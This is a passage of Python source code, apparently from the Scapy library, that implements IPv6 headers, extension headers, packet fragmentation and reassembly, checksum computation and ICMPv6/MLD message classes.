SourceIP6Field(IP6Field): __slots__ = ["dstname"] def __init__(self, name, dstname): IP6Field.__init__(self, name, None) self.dstname 
= dstname def i2m(self, pkt, x): if x is None: dst=getattr(pkt,self.dstname) iff,x,nh = conf.route6.route(dst) return IP6Field.i2m(self, pkt, x) def i2h(self, pkt, x): if x is None: dst=getattr(pkt,self.dstname) if isinstance(dst,Gen): r = map(conf.route6.route, dst) r.sort() if r[0] == r[-1]: x=r[0][1] else: warning("More than one possible route for %s"%repr(dst)) return None else: iff,x,nh = conf.route6.route(dst) return IP6Field.i2h(self, pkt, x) class DestIP6Field(IP6Field, DestField): bindings = {} def __init__(self, name, default): IP6Field.__init__(self, name, None) DestField.__init__(self, name, default) def i2m(self, pkt, x): if x is None: x = self.dst_from_pkt(pkt) return IP6Field.i2m(self, pkt, x) def i2h(self, pkt, x): if x is None: x = self.dst_from_pkt(pkt) return IP6Field.i2h(self, pkt, x) ipv6nh = { 0:"Hop-by-Hop Option Header", 4:"IP", 6:"TCP", 17:"UDP", 41:"IPv6", 43:"Routing Header", 44:"Fragment Header", 47:"GRE", 50:"ESP Header", 51:"AH Header", 58:"ICMPv6", 59:"No Next Header", 60:"Destination Option Header", 132:"SCTP", 135:"Mobility Header"} ipv6nhcls = { 0: "IPv6ExtHdrHopByHop", 4: "IP", 6: "TCP", 17: "UDP", 43: "IPv6ExtHdrRouting", 44: "IPv6ExtHdrFragment", #50: "IPv6ExtHrESP", #51: "IPv6ExtHdrAH", 58: "ICMPv6Unknown", 59: "Raw", 60: "IPv6ExtHdrDestOpt" } class IP6ListField(StrField): __slots__ = ["count_from", "length_from"] islist = 1 def __init__(self, name, default, count_from=None, length_from=None): if default is None: default = [] StrField.__init__(self, name, default) self.count_from = count_from self.length_from = length_from def i2len(self, pkt, i): return 16*len(i) def i2count(self, pkt, i): if type(i) is list: return len(i) return 0 def getfield(self, pkt, s): c = l = None if self.length_from is not None: l = self.length_from(pkt) elif self.count_from is not None: c = self.count_from(pkt) lst = [] ret = "" remain = s if l is not None: remain,ret = s[:l],s[l:] while remain: if c is not None: if c <= 0: break c -= 1 addr = inet_ntop(socket.AF_INET6, remain[:16]) lst.append(addr) remain = remain[16:] return remain+ret,lst def i2m(self, pkt, x): s = '' for y in x: try: y = inet_pton(socket.AF_INET6, y) except: y = socket.getaddrinfo(y, None, socket.AF_INET6)[0][-1][0] y = inet_pton(socket.AF_INET6, y) s += y return s def i2repr(self,pkt,x): s = [] if x == None: return "[]" for y in x: s.append('%s' % y) return "[ %s ]" % (", ".join(s)) class _IPv6GuessPayload: name = "Dummy class that implements guess_payload_class() for IPv6" def default_payload_class(self,p): if self.nh == 58: # ICMPv6 t = ord(p[0]) if len(p) > 2 and t == 139 or t == 140: # Node Info Query return _niquery_guesser(p) if len(p) >= icmp6typesminhdrlen.get(t, sys.maxint): # Other ICMPv6 messages return get_cls(icmp6typescls.get(t,"Raw"), "Raw") return Raw elif self.nh == 135 and len(p) > 3: # Mobile IPv6 return _mip6_mhtype2cls.get(ord(p[2]), MIP6MH_Generic) else: return get_cls(ipv6nhcls.get(self.nh,"Raw"), "Raw") class IPv6(_IPv6GuessPayload, Packet, IPTools): name = "IPv6" fields_desc = [ BitField("version" , 6 , 4), BitField("tc", 0, 8), #TODO: IPv6, ByteField ? 
BitField("fl", 0, 20), ShortField("plen", None), ByteEnumField("nh", 59, ipv6nh), ByteField("hlim", 64), SourceIP6Field("src", "dst"), # dst is for src @ selection DestIP6Field("dst", "::1") ] def route(self): dst = self.dst if isinstance(dst,Gen): dst = iter(dst).next() return conf.route6.route(dst) def mysummary(self): return "%s > %s (%i)" % (self.src,self.dst, self.nh) def post_build(self, p, pay): p += pay if self.plen is None: l = len(p) - 40 p = p[:4]+struct.pack("!H", l)+p[6:] return p def extract_padding(self, s): l = self.plen return s[:l], s[l:] def hashret(self): if self.nh == 58 and isinstance(self.payload, _ICMPv6): if self.payload.type < 128: return self.payload.payload.hashret() elif (self.payload.type in [133,134,135,136,144,145]): return struct.pack("B", self.nh)+self.payload.hashret() nh = self.nh sd = self.dst ss = self.src if self.nh == 43 and isinstance(self.payload, IPv6ExtHdrRouting): # With routing header, the destination is the last # address of the IPv6 list if segleft > 0 nh = self.payload.nh try: sd = self.addresses[-1] except IndexError: sd = '::1' # TODO: big bug with ICMPv6 error messages as the destination of IPerror6 # could be anything from the original list ... if 1: sd = inet_pton(socket.AF_INET6, sd) for a in self.addresses: a = inet_pton(socket.AF_INET6, a) sd = strxor(sd, a) sd = inet_ntop(socket.AF_INET6, sd) if self.nh == 44 and isinstance(self.payload, IPv6ExtHdrFragment): nh = self.payload.nh if self.nh == 0 and isinstance(self.payload, IPv6ExtHdrHopByHop): nh = self.payload.nh if self.nh == 60 and isinstance(self.payload, IPv6ExtHdrDestOpt): foundhao = None for o in self.payload.options: if isinstance(o, HAO): foundhao = o if foundhao: nh = self.payload.nh # XXX what if another extension follows ? ss = foundhao.hoa if conf.checkIPsrc and conf.checkIPaddr: sd = inet_pton(socket.AF_INET6, sd) ss = inet_pton(socket.AF_INET6, self.src) return struct.pack("B",nh)+self.payload.hashret() else: return struct.pack("B", nh)+self.payload.hashret() def answers(self, other): if not isinstance(other, IPv6): # self is reply, other is request return False if conf.checkIPaddr: ss = inet_pton(socket.AF_INET6, self.src) sd = inet_pton(socket.AF_INET6, self.dst) os = inet_pton(socket.AF_INET6, other.src) od = inet_pton(socket.AF_INET6, other.dst) # request was sent to a multicast address (other.dst) # Check reply destination addr matches request source addr (i.e # sd == os) except when reply is multicasted too # XXX test mcast scope matching ? if in6_ismaddr(other.dst): if in6_ismaddr(self.dst): if ((od == sd) or (in6_isaddrllallnodes(self.dst) and in6_isaddrllallservers(other.dst))): return self.payload.answers(other.payload) return False if (os == sd): return self.payload.answers(other.payload) return False elif (sd != os): # or ss != od): <- removed for ICMP errors return False if self.nh == 58 and isinstance(self.payload, _ICMPv6) and self.payload.type < 128: # ICMPv6 Error message -> generated by IPv6 packet # Note : at the moment, we jump the ICMPv6 specific class # to call answers() method of erroneous packet (over # initial packet). There can be cases where an ICMPv6 error # class could implement a specific answers method that perform # a specific task. Currently, don't see any use ... 
return self.payload.payload.answers(other) elif other.nh == 0 and isinstance(other.payload, IPv6ExtHdrHopByHop): return self.payload.answers(other.payload.payload) elif other.nh == 44 and isinstance(other.payload, IPv6ExtHdrFragment): return self.payload.answers(other.payload.payload) elif other.nh == 43 and isinstance(other.payload, IPv6ExtHdrRouting): return self.payload.answers(other.payload.payload) # Buggy if self.payload is a IPv6ExtHdrRouting elif other.nh == 60 and isinstance(other.payload, IPv6ExtHdrDestOpt): return self.payload.payload.answers(other.payload.payload) elif self.nh == 60 and isinstance(self.payload, IPv6ExtHdrDestOpt): # BU in reply to BRR, for instance return self.payload.payload.answers(other.payload) else: if (self.nh != other.nh): return False return self.payload.answers(other.payload) conf.neighbor.register_l3(Ether, IPv6, lambda l2,l3: getmacbyip6(l3.dst)) class IPerror6(IPv6): name = "IPv6 in ICMPv6" def answers(self, other): if not isinstance(other, IPv6): return False sd = inet_pton(socket.AF_INET6, self.dst) ss = inet_pton(socket.AF_INET6, self.src) od = inet_pton(socket.AF_INET6, other.dst) os = inet_pton(socket.AF_INET6, other.src) # Make sure that the ICMPv6 error is related to the packet scapy sent if isinstance(self.underlayer, _ICMPv6) and self.underlayer.type < 128: # find upper layer for self (possible citation) selfup = self.payload while selfup is not None and isinstance(selfup, _IPv6ExtHdr): selfup = selfup.payload # find upper layer for other (initial packet). Also look for RH otherup = other.payload request_has_rh = False while otherup is not None and isinstance(otherup, _IPv6ExtHdr): if isinstance(otherup, IPv6ExtHdrRouting): request_has_rh = True otherup = otherup.payload if ((ss == os and sd == od) or # <- Basic case (ss == os and request_has_rh)): # <- Request has a RH : # don't check dst address # Let's deal with possible MSS Clamping if (isinstance(selfup, TCP) and isinstance(otherup, TCP) and selfup.options != otherup.options): # seems clamped # Save fields modified by MSS clamping old_otherup_opts = otherup.options old_otherup_cksum = otherup.chksum old_otherup_dataofs = otherup.dataofs old_selfup_opts = selfup.options old_selfup_cksum = selfup.chksum old_selfup_dataofs = selfup.dataofs # Nullify them otherup.options = [] otherup.chksum = 0 otherup.dataofs = 0 selfup.options = [] selfup.chksum = 0 selfup.dataofs = 0 # Test it and save result s1 = str(selfup) s2 = str(otherup) l = min(len(s1), len(s2)) res = s1[:l] == s2[:l] # recall saved values otherup.options = old_otherup_opts otherup.chksum = old_otherup_cksum otherup.dataofs = old_otherup_dataofs selfup.options = old_selfup_opts selfup.chksum = old_selfup_cksum selfup.dataofs = old_selfup_dataofs return res s1 = str(selfup) s2 = str(otherup) l = min(len(s1), len(s2)) return s1[:l] == s2[:l] return False def mysummary(self): return Packet.mysummary(self) ############################################################################# ############################################################################# ### Upper Layer Checksum computation ### ############################################################################# ############################################################################# class PseudoIPv6(Packet): # IPv6 Pseudo-header for checksum computation name = "Pseudo IPv6 Header" fields_desc = [ IP6Field("src", "::"), IP6Field("dst", "::"), ShortField("uplen", None), BitField("zero", 0, 24), ByteField("nh", 0) ] def in6_chksum(nh, u, p): """ Performs IPv6 Upper 
Layer checksum computation. Provided parameters are: - 'nh' : value of upper layer protocol - 'u' : upper layer instance (TCP, UDP, ICMPv6*, ). Instance must be provided with all under layers (IPv6 and all extension headers, for example) - 'p' : the payload of the upper layer provided as a string Functions operate by filling a pseudo header class instance (PseudoIPv6) with - Next Header value - the address of _final_ destination (if some Routing Header with non segleft field is present in underlayer classes, last address is used.) - the address of _real_ source (basically the source address of an IPv6 class instance available in the underlayer or the source address in HAO option if some Destination Option header found in underlayer includes this option). - the length is the length of provided payload string ('p') """ ph6 = PseudoIPv6() ph6.nh = nh rthdr = 0 hahdr = 0 final_dest_addr_found = 0 while u != None and not isinstance(u, IPv6): if (isinstance(u, IPv6ExtHdrRouting) and u.segleft != 0 and len(u.addresses) != 0 and final_dest_addr_found == 0): rthdr = u.addresses[-1] final_dest_addr_found = 1 elif (isinstance(u, IPv6ExtHdrDestOpt) and (len(u.options) == 1) and isinstance(u.options[0], HAO)): hahdr = u.options[0].hoa u = u.underlayer if u is None: warning("No IPv6 underlayer to compute checksum. Leaving null.") return 0 if hahdr: ph6.src = hahdr else: ph6.src = u.src if rthdr: ph6.dst = rthdr else: ph6.dst = u.dst ph6.uplen = len(p) ph6s = str(ph6) return checksum(ph6s+p) ############################################################################# ############################################################################# ### Extension Headers ### ############################################################################# ############################################################################# # Inherited by all extension header classes class _IPv6ExtHdr(_IPv6GuessPayload, Packet): name = 'Abstract IPV6 Option Header' aliastypes = [IPv6, IPerror6] # TODO ... #################### IPv6 options for Extension Headers ##################### _hbhopts = { 0x00: "Pad1", 0x01: "PadN", 0x04: "Tunnel Encapsulation Limit", 0x05: "Router Alert", 0x06: "Quick-Start", 0xc2: "Jumbo Payload", 0xc9: "Home Address Option" } class _OTypeField(ByteEnumField): """ Modified BytEnumField that displays information regarding the IPv6 option based on its option type value (What should be done by nodes that process the option if they do not understand it ...) It is used by Jumbo, Pad1, PadN, RouterAlert, HAO options """ pol = {0x00: "00: skip", 0x40: "01: discard", 0x80: "10: discard+ICMP", 0xC0: "11: discard+ICMP not mcast"} enroutechange = {0x00: "0: Don't change en-route", 0x20: "1: May change en-route" } def i2repr(self, pkt, x): s = self.i2s.get(x, repr(x)) polstr = self.pol[(x & 0xC0)] enroutechangestr = self.enroutechange[(x & 0x20)] return "%s [%s, %s]" % (s, polstr, enroutechangestr) class HBHOptUnknown(Packet): # IPv6 Hop-By-Hop Option name = "Scapy6 Unknown Option" fields_desc = [_OTypeField("otype", 0x01, _hbhopts), FieldLenField("optlen", None, length_of="optdata", fmt="B"), StrLenField("optdata", "", length_from = lambda pkt: pkt.optlen) ] def alignment_delta(self, curpos): # By default, no alignment requirement """ As specified in section 4.2 of RFC 2460, every options has an alignment requirement ususally expressed xn+y, meaning the Option Type must appear at an integer multiple of x octest from the start of the header, plus y octet. 
That function is provided the current position from the start of the header and returns required padding length. """ return 0 class Pad1(Packet): # IPv6 Hop-By-Hop Option name = "Pad1" fields_desc = [ _OTypeField("otype", 0x00, _hbhopts) ] def alignment_delta(self, curpos): # No alignment requirement return 0 class PadN(Packet): # IPv6 Hop-By-Hop Option name = "PadN" fields_desc = [_OTypeField("otype", 0x01, _hbhopts), FieldLenField("optlen", None, length_of="optdata", fmt="B"), StrLenField("optdata", "", length_from = lambda pkt: pkt.optlen)] def alignment_delta(self, curpos): # No alignment requirement return 0 class RouterAlert(Packet): # RFC 2711 - IPv6 Hop-By-Hop Option name = "Router Alert" fields_desc = [_OTypeField("otype", 0x05, _hbhopts), ByteField("optlen", 2), ShortEnumField("value", None, { 0: "Datagram contains a MLD message", 1: "Datagram contains RSVP message", 2: "Datagram contains an Active Network message", 68: "NSIS NATFW NSLP", 69: "MPLS OAM", 65535: "Reserved" })] # TODO : Check IANA has not defined new values for value field of RouterAlertOption # TODO : Now that we have that option, we should do something in MLD class that need it # TODO : IANA has defined ranges of values which can't be easily represented here. # iana.org/assignments/ipv6-routeralert-values/ipv6-routeralert-values.xhtml def alignment_delta(self, curpos): # alignment requirement : 2n+0 x = 2 ; y = 0 delta = x*((curpos - y + x - 1)/x) + y - curpos return delta class Jumbo(Packet): # IPv6 Hop-By-Hop Option name = "Jumbo Payload" fields_desc = [_OTypeField("otype", 0xC2, _hbhopts), ByteField("optlen", 4), IntField("jumboplen", None) ] def alignment_delta(self, curpos): # alignment requirement : 4n+2 x = 4 ; y = 2 delta = x*((curpos - y + x - 1)/x) + y - curpos return delta class HAO(Packet): # IPv6 Destination Options Header Option name = "Home Address Option" fields_desc = [_OTypeField("otype", 0xC9, _hbhopts), ByteField("optlen", 16), IP6Field("hoa", "::") ] def alignment_delta(self, curpos): # alignment requirement : 8n+6 x = 8 ; y = 6 delta = x*((curpos - y + x - 1)/x) + y - curpos return delta _hbhoptcls = { 0x00: Pad1, 0x01: PadN, 0x05: RouterAlert, 0xC2: Jumbo, 0xC9: HAO } ######################## Hop-by-Hop Extension Header ######################## class _HopByHopOptionsField(PacketListField): __slots__ = ["curpos"] def __init__(self, name, default, cls, curpos, count_from=None, length_from=None): self.curpos = curpos PacketListField.__init__(self, name, default, cls, count_from=count_from, length_from=length_from) def i2len(self, pkt, i): l = len(self.i2m(pkt, i)) return l def i2count(self, pkt, i): if type(i) is list: return len(i) return 0 def getfield(self, pkt, s): c = l = None if self.length_from is not None: l = self.length_from(pkt) elif self.count_from is not None: c = self.count_from(pkt) opt = [] ret = "" x = s if l is not None: x,ret = s[:l],s[l:] while x: if c is not None: if c <= 0: break c -= 1 o = ord(x[0]) # Option type cls = self.cls if _hbhoptcls.has_key(o): cls = _hbhoptcls[o] try: op = cls(x) except: op = self.cls(x) opt.append(op) if isinstance(op.payload, conf.raw_layer): x = op.payload.load del(op.payload) else: x = "" return x+ret,opt def i2m(self, pkt, x): autopad = None try: autopad = getattr(pkt, "autopad") # Hack : 'autopad' phantom field except: autopad = 1 if not autopad: return "".join(map(str, x)) curpos = self.curpos s = "" for p in x: d = p.alignment_delta(curpos) curpos += d if d == 1: s += str(Pad1()) elif d != 0: s += str(PadN(optdata='\x00'*(d-2))) pstr = 
str(p) curpos += len(pstr) s += pstr # Let's make the class including our option field # a multiple of 8 octets long d = curpos % 8 if d == 0: return s d = 8 - d if d == 1: s += str(Pad1()) elif d != 0: s += str(PadN(optdata='\x00'*(d-2))) return s def addfield(self, pkt, s, val): return s+self.i2m(pkt, val) class _PhantomAutoPadField(ByteField): def addfield(self, pkt, s, val): return s def getfield(self, pkt, s): return s, 1 def i2repr(self, pkt, x): if x: return "On" return "Off" class IPv6ExtHdrHopByHop(_IPv6ExtHdr): name = "IPv6 Extension Header - Hop-by-Hop Options Header" fields_desc = [ ByteEnumField("nh", 59, ipv6nh), FieldLenField("len", None, length_of="options", fmt="B", adjust = lambda pkt,x: (x+2+7)/8 - 1), _PhantomAutoPadField("autopad", 1), # autopad activated by default _HopByHopOptionsField("options", [], HBHOptUnknown, 2, length_from = lambda pkt: (8*(pkt.len+1))-2) ] overload_fields = {IPv6: { "nh": 0 }} ######################## Destination Option Header ########################## class IPv6ExtHdrDestOpt(_IPv6ExtHdr): name = "IPv6 Extension Header - Destination Options Header" fields_desc = [ ByteEnumField("nh", 59, ipv6nh), FieldLenField("len", None, length_of="options", fmt="B", adjust = lambda pkt,x: (x+2+7)/8 - 1), _PhantomAutoPadField("autopad", 1), # autopad activated by default _HopByHopOptionsField("options", [], HBHOptUnknown, 2, length_from = lambda pkt: (8*(pkt.len+1))-2) ] overload_fields = {IPv6: { "nh": 60 }} ############################# Routing Header ################################ class IPv6ExtHdrRouting(_IPv6ExtHdr): name = "IPv6 Option Header Routing" fields_desc = [ ByteEnumField("nh", 59, ipv6nh), FieldLenField("len", None, count_of="addresses", fmt="B", adjust = lambda pkt,x:2*x), # in 8 bytes blocks ByteField("type", 0), ByteField("segleft", None), BitField("reserved", 0, 32), # There is meaning in this field ... IP6ListField("addresses", [], length_from = lambda pkt: 8*pkt.len)] overload_fields = {IPv6: { "nh": 43 }} def post_build(self, pkt, pay): if self.segleft is None: pkt = pkt[:3]+struct.pack("B", len(self.addresses))+pkt[4:] return _IPv6ExtHdr.post_build(self, pkt, pay) ########################### Fragmentation Header ############################ class IPv6ExtHdrFragment(_IPv6ExtHdr): name = "IPv6 Extension Header - Fragmentation header" fields_desc = [ ByteEnumField("nh", 59, ipv6nh), BitField("res1", 0, 8), BitField("offset", 0, 13), BitField("res2", 0, 2), BitField("m", 0, 1), IntField("id", None) ] overload_fields = {IPv6: { "nh": 44 }} def defragment6(pktlist): """ Performs defragmentation of a list of IPv6 packets. Packets are reordered. Crap is dropped. What lacks is completed by 'X' characters. """ l = filter(lambda x: IPv6ExtHdrFragment in x, pktlist) # remove non fragments if not l: return [] id = l[0][IPv6ExtHdrFragment].id llen = len(l) l = filter(lambda x: x[IPv6ExtHdrFragment].id == id, l) if len(l) != llen: warning("defragment6: some fragmented packets have been removed from list") llen = len(l) # reorder fragments i = 0 res = [] while l: min_pos = 0 min_offset = l[0][IPv6ExtHdrFragment].offset for p in l: cur_offset = p[IPv6ExtHdrFragment].offset if cur_offset < min_offset: min_pos = 0 min_offset = cur_offset res.append(l[min_pos]) del(l[min_pos]) # regenerate the fragmentable part fragmentable = "" for p in res: q=p[IPv6ExtHdrFragment] offset = 8*q.offset if offset != len(fragmentable): warning("Expected an offset of %d. Found %d. 
Padding with XXXX" % (len(fragmentable), offset)) fragmentable += "X"*(offset - len(fragmentable)) fragmentable += str(q.payload) # Regenerate the unfragmentable part. q = res[0] nh = q[IPv6ExtHdrFragment].nh q[IPv6ExtHdrFragment].underlayer.nh = nh del q[IPv6ExtHdrFragment].underlayer.payload q /= conf.raw_layer(load=fragmentable) return IPv6(str(q)) def fragment6(pkt, fragSize): """ Performs fragmentation of an IPv6 packet. Provided packet ('pkt') must already contain an IPv6ExtHdrFragment() class. 'fragSize' argument is the expected maximum size of fragments (MTU). The list of packets is returned. If packet does not contain an IPv6ExtHdrFragment class, it is returned in result list. """ pkt = pkt.copy() if not IPv6ExtHdrFragment in pkt: # TODO : automatically add a fragment before upper Layer # at the moment, we do nothing and return initial packet # as single element of a list return [pkt] # If the payload is bigger than 65535, a Jumbo payload must be used, as # an IPv6 packet can't be bigger than 65535 bytes. if len(str(pkt[IPv6ExtHdrFragment])) > 65535: warning("An IPv6 packet can'be bigger than 65535, please use a Jumbo payload.") return [] s = str(pkt) # for instantiation to get upper layer checksum right if len(s) <= fragSize: return [pkt] # Fragmentable part : fake IPv6 for Fragmentable part length computation fragPart = pkt[IPv6ExtHdrFragment].payload tmp = str(IPv6(src="::1", dst="::1")/fragPart) fragPartLen = len(tmp) - 40 # basic IPv6 header length fragPartStr = s[-fragPartLen:] # Grab Next Header for use in Fragment Header nh = pkt[IPv6ExtHdrFragment].nh # Keep fragment header fragHeader = pkt[IPv6ExtHdrFragment] del fragHeader.payload # detach payload # Unfragmentable Part unfragPartLen = len(s) - fragPartLen - 8 unfragPart = pkt del pkt[IPv6ExtHdrFragment].underlayer.payload # detach payload # Cut the fragmentable part to fit fragSize. Inner fragments have # a length that is an integer multiple of 8 octets. last Frag MTU # can be anything below MTU lastFragSize = fragSize - unfragPartLen - 8 innerFragSize = lastFragSize - (lastFragSize % 8) if lastFragSize <= 0 or innerFragSize == 0: warning("Provided fragment size value is too low. " + "Should be more than %d" % (unfragPartLen + 8)) return [unfragPart/fragHeader/fragPart] remain = fragPartStr res = [] fragOffset = 0 # offset, incremeted during creation fragId = random.randint(0,0xffffffff) # random id ... if fragHeader.id is not None: # ... except id provided by user fragId = fragHeader.id fragHeader.m = 1 fragHeader.id = fragId fragHeader.nh = nh # Main loop : cut, fit to FRAGSIZEs, fragOffset, Id ... 
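    # Worked example (illustrative figures only, not part of the original
    # code): for IPv6()/IPv6ExtHdrFragment() over a large payload with
    # fragSize=1280, the unfragmentable part is the 40-byte IPv6 header, so
    # lastFragSize = 1280 - 40 - 8 = 1232 and
    # innerFragSize = 1232 - (1232 % 8) = 1232; every inner fragment then
    # carries 1232 bytes of the fragmentable part and fragOffset grows by 154.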
while True: if (len(remain) > lastFragSize): tmp = remain[:innerFragSize] remain = remain[innerFragSize:] fragHeader.offset = fragOffset # update offset fragOffset += (innerFragSize / 8) # compute new one if IPv6 in unfragPart: unfragPart[IPv6].plen = None tempo = unfragPart/fragHeader/conf.raw_layer(load=tmp) res.append(tempo) else: fragHeader.offset = fragOffset # update offSet fragHeader.m = 0 if IPv6 in unfragPart: unfragPart[IPv6].plen = None tempo = unfragPart/fragHeader/conf.raw_layer(load=remain) res.append(tempo) break return res ############################### AH Header ################################### # class _AHFieldLenField(FieldLenField): # def getfield(self, pkt, s): # l = getattr(pkt, self.fld) # l = (l*8)-self.shift # i = self.m2i(pkt, s[:l]) # return s[l:],i # class _AHICVStrLenField(StrLenField): # def i2len(self, pkt, x): # class IPv6ExtHdrAH(_IPv6ExtHdr): # name = "IPv6 Extension Header - AH" # fields_desc = [ ByteEnumField("nh", 59, ipv6nh), # _AHFieldLenField("len", None, "icv"), # ShortField("res", 0), # IntField("spi", 0), # IntField("sn", 0), # _AHICVStrLenField("icv", None, "len", shift=2) ] # overload_fields = {IPv6: { "nh": 51 }} # def post_build(self, pkt, pay): # if self.len is None: # pkt = pkt[0]+struct.pack("!B", 2*len(self.addresses))+pkt[2:] # if self.segleft is None: # pkt = pkt[:3]+struct.pack("!B", len(self.addresses))+pkt[4:] # return _IPv6ExtHdr.post_build(self, pkt, pay) ############################### ESP Header ################################## # class IPv6ExtHdrESP(_IPv6extHdr): # name = "IPv6 Extension Header - ESP" # fields_desc = [ IntField("spi", 0), # IntField("sn", 0), # # there is things to extract from IKE work # ] # overloads_fields = {IPv6: { "nh": 50 }} ############################################################################# ############################################################################# ### ICMPv6* Classes ### ############################################################################# ############################################################################# icmp6typescls = { 1: "ICMPv6DestUnreach", 2: "ICMPv6PacketTooBig", 3: "ICMPv6TimeExceeded", 4: "ICMPv6ParamProblem", 128: "ICMPv6EchoRequest", 129: "ICMPv6EchoReply", 130: "ICMPv6MLQuery", 131: "ICMPv6MLReport", 132: "ICMPv6MLDone", 133: "ICMPv6ND_RS", 134: "ICMPv6ND_RA", 135: "ICMPv6ND_NS", 136: "ICMPv6ND_NA", 137: "ICMPv6ND_Redirect", #138: Do Me - RFC 2894 - Seems painful 139: "ICMPv6NIQuery", 140: "ICMPv6NIReply", 141: "ICMPv6ND_INDSol", 142: "ICMPv6ND_INDAdv", #143: Do Me - RFC 3810 144: "ICMPv6HAADRequest", 145: "ICMPv6HAADReply", 146: "ICMPv6MPSol", 147: "ICMPv6MPAdv", #148: Do Me - SEND related - RFC 3971 #149: Do Me - SEND related - RFC 3971 151: "ICMPv6MRD_Advertisement", 152: "ICMPv6MRD_Solicitation", 153: "ICMPv6MRD_Termination", } icmp6typesminhdrlen = { 1: 8, 2: 8, 3: 8, 4: 8, 128: 8, 129: 8, 130: 24, 131: 24, 132: 24, 133: 8, 134: 16, 135: 24, 136: 24, 137: 40, #139: #140 141: 8, 142: 8, 144: 8, 145: 8, 146: 8, 147: 8, 151: 8, 152: 4, 153: 4 } icmp6types = { 1 : "Destination unreachable", 2 : "Packet too big", 3 : "Time exceeded", 4 : "Parameter problem", 100 : "Private Experimentation", 101 : "Private Experimentation", 128 : "Echo Request", 129 : "Echo Reply", 130 : "MLD Query", 131 : "MLD Report", 132 : "MLD Done", 133 : "Router Solicitation", 134 : "Router Advertisement", 135 : "Neighbor Solicitation", 136 : "Neighbor Advertisement", 137 : "Redirect Message", 138 : "Router Renumbering", 139 : "ICMP Node Information Query", 140 : "ICMP 
Node Information Response", 141 : "Inverse Neighbor Discovery Solicitation Message", 142 : "Inverse Neighbor Discovery Advertisement Message", 143 : "Version 2 Multicast Listener Report", 144 : "Home Agent Address Discovery Request Message", 145 : "Home Agent Address Discovery Reply Message", 146 : "Mobile Prefix Solicitation", 147 : "Mobile Prefix Advertisement", 148 : "Certification Path Solicitation", 149 : "Certification Path Advertisement", 151 : "Multicast Router Advertisement", 152 : "Multicast Router Solicitation", 153 : "Multicast Router Termination", 200 : "Private Experimentation", 201 : "Private Experimentation" } class _ICMPv6(Packet): name = "ICMPv6 dummy class" overload_fields = {IPv6: {"nh": 58}} def post_build(self, p, pay): p += pay if self.cksum == None: chksum = in6_chksum(58, self.underlayer, p) p = p[:2]+struct.pack("!H", chksum)+p[4:] return p def hashret(self): return self.payload.hashret() def answers(self, other): # isinstance(self.underlayer, _IPv6ExtHdr) may introduce a bug ... if (isinstance(self.underlayer, IPerror6) or isinstance(self.underlayer, _IPv6ExtHdr) and isinstance(other, _ICMPv6)): if not ((self.type == other.type) and (self.code == other.code)): return 0 return 1 return 0 class _ICMPv6Error(_ICMPv6): name = "ICMPv6 errors dummy class" def guess_payload_class(self,p): return IPerror6 class ICMPv6Unknown(_ICMPv6): name = "Scapy6 ICMPv6 fallback class" fields_desc = [ ByteEnumField("type",1, icmp6types), ByteField("code",0), XShortField("cksum", None), StrField("msgbody", "")] ################################## RFC 2460 ################################# class ICMPv6DestUnreach(_ICMPv6Error): name = "ICMPv6 Destination Unreachable" fields_desc = [ ByteEnumField("type",1, icmp6types), ByteEnumField("code",0, { 0: "No route to destination", 1: "Communication with destination administratively prohibited", 2: "Beyond scope of source address", 3: "Address unreachable", 4: "Port unreachable" }), XShortField("cksum", None), ByteField("length", 0), X3BytesField("unused",0)] class ICMPv6PacketTooBig(_ICMPv6Error): name = "ICMPv6 Packet Too Big" fields_desc = [ ByteEnumField("type",2, icmp6types), ByteField("code",0), XShortField("cksum", None), IntField("mtu",1280)] class ICMPv6TimeExceeded(_ICMPv6Error): name = "ICMPv6 Time Exceeded" fields_desc = [ ByteEnumField("type",3, icmp6types), ByteEnumField("code",0, { 0: "hop limit exceeded in transit", 1: "fragment reassembly time exceeded"}), XShortField("cksum", None), ByteField("length", 0), X3BytesField("unused",0)] # The default pointer value is set to the next header field of # the encapsulated IPv6 packet class ICMPv6ParamProblem(_ICMPv6Error): name = "ICMPv6 Parameter Problem" fields_desc = [ ByteEnumField("type",4, icmp6types), ByteEnumField("code",0, {0: "erroneous header field encountered", 1: "unrecognized Next Header type encountered", 2: "unrecognized IPv6 option encountered"}), XShortField("cksum", None), IntField("ptr",6)] class ICMPv6EchoRequest(_ICMPv6): name = "ICMPv6 Echo Request" fields_desc = [ ByteEnumField("type", 128, icmp6types), ByteField("code", 0), XShortField("cksum", None), XShortField("id",0), XShortField("seq",0), StrField("data", "")] def mysummary(self): return self.sprintf("%name% (id: %id% seq: %seq%)") def hashret(self): return struct.pack("HH",self.id,self.seq)+self.payload.hashret() class ICMPv6EchoReply(ICMPv6EchoRequest): name = "ICMPv6 Echo Reply" type = 129 def answers(self, other): # We could match data content between request and reply. 
        return (isinstance(other, ICMPv6EchoRequest) and
                self.id == other.id and self.seq == other.seq and
                self.data == other.data)


############ ICMPv6 Multicast Listener Discovery (RFC3810) ##################

# All MLD messages are emitted with a link-local source address.
# -> Enforce this in post_build if none is specified.
# The Hop-Limit value must be 1.
# "and an IPv6 Router Alert option in a Hop-by-Hop Options
# header. (The router alert option is necessary to cause routers to
# examine MLD messages sent to multicast addresses in which the router
# itself has no interest"

class _ICMPv6ML(_ICMPv6):
    fields_desc = [ ByteEnumField("type", 130, icmp6types),
                    ByteField("code", 0),
                    XShortField("cksum", None),
                    ShortField("mrd", 0),
                    ShortField("reserved", 0),
                    IP6Field("mladdr","::")]

# General queries are sent to the link-scope all-nodes multicast
# address ff02::1, with a multicast address field of 0 and an MRD of
# [Query Response Interval].
# Default value for mladdr is set to 0 for a General Query, and
# overloaded by the user for a Multicast Address specific query.
# TODO : See what we can do to automatically include a Router Alert
#        Option in a Hop-by-Hop Options Header.
class ICMPv6MLQuery(_ICMPv6ML): # RFC 2710
    name = "MLD - Multicast Listener Query"
    type   = 130
    mrd    = 10000 # 10s for mrd
    mladdr = "::"
    overload_fields = {IPv6: { "dst": "ff02::1", "hlim": 1, "nh": 58 }}
    def hashret(self):
        if self.mladdr != "::":
            # Hash on the packed multicast address; the previous
            # struct.pack("HH", self.mladdr) raised on a string argument.
            return inet_pton(socket.AF_INET6, self.mladdr) + self.payload.hashret()
        else:
            return self.payload.hashret()

# TODO : See what we can do to automatically include a Router Alert
#        Option in a Hop-by-Hop Options Header.
class ICMPv6MLReport(_ICMPv6ML): # RFC 2710
    name = "MLD - Multicast Listener Report"
    type = 131
    overload_fields = {IPv6: {"hlim": 1, "nh": 58}}
    # TODO: implement hashret and answers

# When a node ceases to listen to a multicast address on an interface,
# it SHOULD send a single Done message to the link-scope all-routers
